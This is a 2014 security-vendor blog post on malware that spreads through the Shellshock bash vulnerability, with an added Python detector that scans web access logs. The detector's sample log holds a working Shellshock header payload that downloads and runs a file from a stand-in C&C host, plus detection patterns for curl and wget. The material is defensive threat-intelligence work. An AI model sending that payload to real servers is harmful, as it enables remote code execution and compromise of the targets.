Malware in the Wild Abusing "Shellshock" Vulnerability
Posted by Carl Leonard on 01 October 2014 07:38 AM
Since the Shellshock vulnerability became public knowledge, our ThreatSeeker® Intelligence Cloud has seen evidence of this vulnerability being exploited in the wild to drop malware.
We shall illustrate one such example below:
Backdoors and Bot Nets
The observed malware found to be exploiting the Shellshock vulnerability has been dropped by various command and control (C&C) servers previously known to Websense Security Labs™. The malware has the following capabilities:
The malware has been seen to be downloaded to a compromised machine by exploiting the Shellshock vulnerability and invoking commands such as "curl" or "wget," and then executing the malicious payload. To date, we have seen 4 variants of the Linux backdoor and several versions of the Perl-based IRC bot.
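As an added detection example (not code from the Websense post), the snippet below scans constructed web-server access-log lines for the Shellshock trigger in a header value, a bash function definition beginning with "() {", and reports whether a curl or wget fetch followed it, matching the download-then-execute pattern described above. The log format, the client IPs and the C&C hostname are all assumed sample values.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of combined-format access log lines. Only the third line
# carries a Shellshock trigger (bash function prefix "() {" in the User-Agent)
# followed by a wget download of a payload; the second is a benign curl client.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Sep/2014:10:01:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 88 "-" "curl/7.35.0"
198.51.100.9 - - [25/Sep/2014:10:02:11 +0000] "GET /cgi-bin/status HTTP/1.1" 200 88 "-" "() { :;}; /bin/bash -c \\"wget -O /tmp/x http://c2.example.invalid/x; /tmp/x\\""
"""

# Vulnerable bash treats an environment value starting with "() {" as an
# exported function and executes whatever follows the closing brace.
FUNC_PREFIX = re.compile(r"\(\)\s*\{")
# Download tools the post reports being invoked to fetch the payload.
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
# Combined log format: client, timestamp, request, status, size, referer, UA.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)


@dataclass
class Alert:
    ip: str
    field: str                 # header that carried the trigger
    downloader: Optional[str]  # "curl"/"wget" if a fetch followed the trigger


def scan_line(line: str) -> Optional[Alert]:
    """Return an Alert if a header value on this line carries the trigger."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for field in ("referer", "ua"):
        value = m.group(field)
        hit = FUNC_PREFIX.search(value)
        if hit:
            # Only the text after the function body is what bash would execute.
            d = DOWNLOADER.search(value[hit.end():])
            return Alert(m.group("ip"), field, d.group(1) if d else None)
    return None


def scan_log(text: str) -> List[Alert]:
    return [a for a in (scan_line(l) for l in text.splitlines()) if a]
```

A plain curl or wget User-Agent does not raise an alert on its own; the function prefix must be present, which keeps ordinary command-line clients out of the results.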
Popularity Since Vulnerability Disclosure
The following domains and IPs have been found to be used as command & control (C&C) points for this campaign (amongst others):
Figure 1: chart showing increase in prevalence of C&C associated with the above malware, peaking around September 25, 2014.
We have seen C&C traffic to these IPs in the last 2 months, showing that they have been used for malicious and bot network campaigns prior to the Shellshock vulnerability disclosure. In fact, going back as far as 2012, we see that one such C&C was used in a Point-of-Sale malware campaign known as "vSkimmer." More recently, we have observed it serving up an IRC bot.
The spike that we saw on September 25, 2014, ties in with the usage of these servers as command & control points for malware dropped in the exploitation of the Shellshock vulnerability. We have deduced that these are likely compromised servers, since we do see the infrastructure hosting legitimate websites. Cyber-criminals typically prefer compromised servers in order to piggyback on the reputation of those known hosts and to enhance their ability to remain anonymous.
Websense customers are protected from the malware described above by ACE, our Advanced Classification Engine, at the following stages:
Additional Abuse of Shellshock Expected
Since the initial disclosure of CVE-2014-6271, we have seen another 5 vulnerabilities identified in Bash. These have been assigned identifiers:
Experience has taught us that as cyber-criminals zoom in on the vulnerable code branch, additional vulnerabilities are likely to surface. We strongly recommend that you monitor such issues and apply mitigation accordingly.
We have updated our ThreatSeeker Intelligence Cloud to seek out likely candidates across the kill chain.